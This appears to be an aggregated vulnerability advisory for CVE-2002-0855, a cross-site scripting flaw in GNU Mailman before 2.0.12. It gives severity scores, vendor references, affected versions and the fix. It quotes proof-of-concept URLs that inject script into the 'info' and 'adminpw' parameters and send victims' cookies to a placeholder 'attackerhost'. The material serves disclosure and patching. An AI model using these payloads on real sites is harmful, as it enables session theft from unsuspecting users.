CVE-2002-0855
CVSS 7.5
Published: 2002-09-05 00:00:00
Last revised: 2008-09-05 16:29:07

[Original text] Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.


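[CNNVD] GNU Mailman subscription cross-site scripting vulnerability (CNNVD-200209-011)

Mailman versions before 2.0.12 contain a cross-site scripting vulnerability. Remote attackers can execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.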

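- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0855
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0855
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-011
(Official data source) CNNVD

- Other links and resources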

http://www.securityfocus.com/bid/5298
(VENDOR_ADVISORY)  BID  5298
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
(VENDOR_ADVISORY)  CONFIRM  http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
http://www.redhat.com/support/errata/RHSA-2002-181.html
(UNKNOWN)  REDHAT  RHSA-2002:181
http://www.redhat.com/support/errata/RHSA-2002-178.html
(UNKNOWN)  REDHAT  RHSA-2002:178
http://www.redhat.com/support/errata/RHSA-2002-177.html
(UNKNOWN)  REDHAT  RHSA-2002:177
http://www.redhat.com/support/errata/RHSA-2002-176.html
(UNKNOWN)  REDHAT  RHSA-2002:176
http://www.iss.net/security_center/static/9985.php
(VENDOR_ADVISORY)  XF  mailman-subscription-option-xss(9985)
http://www.debian.org/security/2002/dsa-147
(UNKNOWN)  DEBIAN  DSA-147
http://archives.neohapsis.com/archives/bugtraq/2002-07/0268.html
(UNKNOWN)  BUGTRAQ  20020724 cross-site scripting bug of Mailman
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000522
(UNKNOWN)  CONECTIVA  CLA-2002:522

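- Vulnerability information

GNU Mailman subscription cross-site scripting vulnerability
High risk  Cross-site scripting
2002-09-05 00:00:00 2005-10-20 00:00:00
Remote
Mailman versions before 2.0.12 contain a cross-site scripting vulnerability. Remote attackers can execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.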

- Advisories and patches

This issue has been addressed in Mailman version 2.0.12.

GNU Mailman 2.0
GNU Mailman 2.0.1
GNU Mailman 2.0.10
GNU Mailman 2.0.11
GNU Mailman 2.0.2
GNU Mailman 2.0.3
GNU Mailman 2.0.4
GNU Mailman 2.0.5
GNU Mailman 2.0.6
GNU Mailman 2.0.7
GNU Mailman 2.0.8
GNU Mailman 2.0.9

- Vulnerability information (21641)

GNU Mailman 2.0.x Subscribe Cross-Site Scripting Vulnerability (EDBID:21641)
cgi remote
2002-07-24 Verified
0 office
N/A
source: http://www.securityfocus.com/bid/5298/info

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>		

- Vulnerability information (21642)

GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting Vulnerability (EDBID:21642)
cgi remote
2002-07-24 Verified
0 office
N/A
source: http://www.securityfocus.com/bid/5299/info

GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. 

A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.

http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);		

- Vulnerability information

9239
Mailman /subscribe/ml-name Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-07-11 Unknown
2002-07-24 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

GNU Mailman Subscribe Cross-Site Scripting Vulnerability
Input Validation Error 5298
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to office <office@office.ac>.

- Affected program versions

GNU Mailman 2.0.11
+ Debian Linux 3.0
GNU Mailman 2.0.10
GNU Mailman 2.0.9
GNU Mailman 2.0.8
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
- RedHat PowerTools 7.1
- RedHat PowerTools 7.0
GNU Mailman 2.0.7
GNU Mailman 2.0.6
GNU Mailman 2.0.5
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
GNU Mailman 2.0.4
GNU Mailman 2.0.3
GNU Mailman 2.0.2
GNU Mailman 2.0.1
GNU Mailman 2.0
GNU Mailman 2.0.12

- Unaffected program versions

GNU Mailman 2.0.12

- Vulnerability discussion

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

- Exploit

The following example was provided:

http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>

- Solution

This issue has been addressed in Mailman version 2.0.12.

GNU Mailman 2.0
GNU Mailman 2.0.1
GNU Mailman 2.0.10
GNU Mailman 2.0.11
GNU Mailman 2.0.2
GNU Mailman 2.0.3
GNU Mailman 2.0.4
GNU Mailman 2.0.5
GNU Mailman 2.0.6
GNU Mailman 2.0.7
GNU Mailman 2.0.8
GNU Mailman 2.0.9

- Related references

 

 
